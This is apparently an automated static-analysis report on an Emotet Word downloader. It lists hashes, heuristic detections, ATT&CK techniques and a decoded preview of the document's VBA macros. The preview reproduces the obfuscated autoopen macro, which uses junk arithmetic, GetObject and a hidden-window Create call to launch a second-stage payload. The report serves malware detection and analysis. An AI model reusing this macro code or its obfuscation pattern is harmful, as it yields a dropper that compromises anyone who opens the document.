Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 2d4bafc0b214d166…

MALICIOUS

Office (OLE)

147.8 KB Created: 2019-03-19 11:12:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: 3cbacc07202f0df9ac81ef868a87c55b SHA-1: 671a272a34d2c98dfc7d149c59a16876c72f0bab SHA-256: 2d4bafc0b214d166ae41ca6af6487fbe824b2925c2ea34f6f4ba1279ffe84288
222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically an AutoOpen macro, which is a common characteristic of Emotet. The GetObject call within the macro suggests it's designed to download and execute a second-stage payload. ClamAV also explicitly identifies the file as 'Doc.Downloader.Emotet-6901574-0'. The presence of VBA macros and the downloader functionality strongly indicate a malicious intent.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6901574-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6901574-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12409 bytes
SHA-256: 7edd29c748930ae797f6e92900c644df6fdfaf710632fc36ccf1b7812eef0eef
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "XAocXD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "PxAAAXA"
Attribute VB_Base = "0{FB6352A4-015F-40AE-940E-DFEF496155BC}{6A887CBC-6F52-456C-997C-2C3C6AC55011}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "YAAUABDQ"
Sub autoopen()
On Error Resume Next
   If FkAw4A = wUAAkQ Then
bxDAkAA = 68899272 - ChrB(679426435 * Round(479567069) + UAADQA - ChrB(X1AXADwG)) / IAUAA1wC / Rnd(50097093 / iBkAxU * SpBb / ChrW(696308113 * CBool(353109990) / 279340230 + CStr(ZAAwUAA))) / 752931751 * Oct(bUAAQD)
End If
   If dABAU4 = uG1BAAGk Then
WQkAxA = 429675079 - ChrB(212524986 * Round(113521636) + GAcUkAA1 - ChrB(hQw4w4)) / wAkCZAwk / Rnd(841954471 / tA_XxQA * SpBb / ChrW(307636191 * CBool(136730650) / 178939889 + CStr(sCUAQokA))) / 813357237 * Oct(JAAXAAZ)
End If
Set nAB4XAAA = GetObject(PxAAAXA.QxkQDxx)
   If YD4UABU = hQxAAQ Then
XAcADQk = 712862436 - ChrB(762443535 * Round(547345860) + sXADAAG - ChrB(dAAXUA)) / RQBAAAX / Rnd(475122927 / c_GkxAA * SpBb / ChrW(426561580 * CBool(461981977) / 713411298 + CStr(ukABoZAo))) / 682619671 * Oct(LAQZ44)
End If
   If WBBBAD = WAU1AAo Then
VcDAoAA = 1819243 - ChrB(401278137 * Round(772785802) + SAoQUkQ - ChrB(CCo4AAZD)) / NAwDAkAB / Rnd(106339981 / s1koDQQQ * SpBb / ChrW(339776298 * CBool(117710025) / 90242049 + CStr(SAwA_xAA))) / 259947921 * Oct(okGBAA)
End If
   If U4AAoBU_ = IAkAAQAA Then
uGQcAABU = 356988806 - ChrB(810293185 * Round(769993287) + JAAQGA - ChrB(QUwBQoDA)) / jQBxUD / Rnd(820790237 / BxkAA1U * SpBb / ChrW(927173390 * CBool(360088276) / 710026633 + CStr(IAwBAA))) / 437471075 * Oct(XAcAAA_)
End If
nAB4XAAA.ShowWindow = 392260 - 392260
   If tkA1kUQ = iXUkoQ Then
wUAAxQA_ = 741411855 - ChrB(123398079 * Round(257938211) + V1ZGAZ - ChrB(oUkoxUAw)) / SQAAQA / Rnd(323943788 / aBUA1kD * SpBb / ChrW(250440536 * CBool(885181564) / 224731277 + CStr(AUCAAAUx))) / 65360689 * Oct(AAo1AA)
End If
   If vAAokUx = z1_U_XX Then
uwxB1AG = 233935790 - ChrB(311928206 * Round(661343867) + jDABAGQc - ChrB(nAQGQAZ)) / kAQGxQD / Rnd(133119980 / tDAB4A * SpBb / ChrW(228362861 * CBool(709869076) / 145819830 + CStr(WZA1_UQ))) / 612309788 * Oct(mZk4AoU)
End If
   If ZQkDBA1B = qA_cABDA Then
KUkUQG = 325743514 - ChrB(106151707 * Round(130857067) + aAZcAUA - ChrB(tQ14AA)) / CAA_AkQQ / Rnd(653977329 / uAXUAA1 * SpBb / ChrW(241098975 * CBool(982147915) / 9798891 + CStr(qAAAGAQ))) / 666506995 * Oct(hABDCA)
End If
GetObject(PxAAAXA.hAQcUQU).Create% bUAAQA + PxAAAXA.QwAQAD + VQ_Dcc + PxAAAXA.jBxGBA1U + HDBBBQA + PxAAAXA.VAxcA_ + dwCAUB, bxAUAQ, nAB4XAAA, jXZAUZAD
   If V4AQGAQ = IwAUo4DA Then
MXQUQA = 147221648 - ChrB(31558251 * Round(2172008) + u_DXUA - ChrB(QGAXCG)) / noxAUXB / Rnd(222697576 / tQAQwQA * SpBb / ChrW(853272758 * CBool(259400057) / 768003727 + CStr(ZAQ4G4))) / 175996582 * Oct(CBXUAcAA)
End If
   If cxAQAA = JUAAQAA Then
RAQGDBAw = 434653231 - ChrB(997487585 * Round(829813833) + uXAAAc - ChrB(zAUAcxU)) / WAGX4DA / Rnd(485921830 / b1AAQoD * SpBb / ChrW(806640963 * CBool(442477230) / 1712495 + CStr(SA1DZU))) / 34559375 * Oct(aAABUBA)
End If
   If wQAC4AxA = zBAAG1A4 Then
FDXcZAD = 194395026 - ChrB(758302110 * Round(375543275) + E4AAUQ1B - ChrB(sAAA4DA_)) / RUBBDD_ / Rnd(292466042 / cZZwAABA * SpBb / ChrW(906696086 * CBool(255095975) / 332088701 + CStr(NAUABAAB))) / 283714093 * Oct(XGAcAAAc)
End If
End Sub

' Processing file: /opt/analyzer/scan_staging/c5d8a154be09424ca4b65b9a1f85a6dc.bin
' ===============================================================================
' Module streams:
' Macros/VBA/XAocXD - 1104 bytes
' Macros/VBA/PxAAAXA - 1158 bytes
' Macros/VBA/YAAUABDQ - 5434 bytes
' Line #0:
' 	FuncDefn (Sub YAAUABDQ())
' Line #1:

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.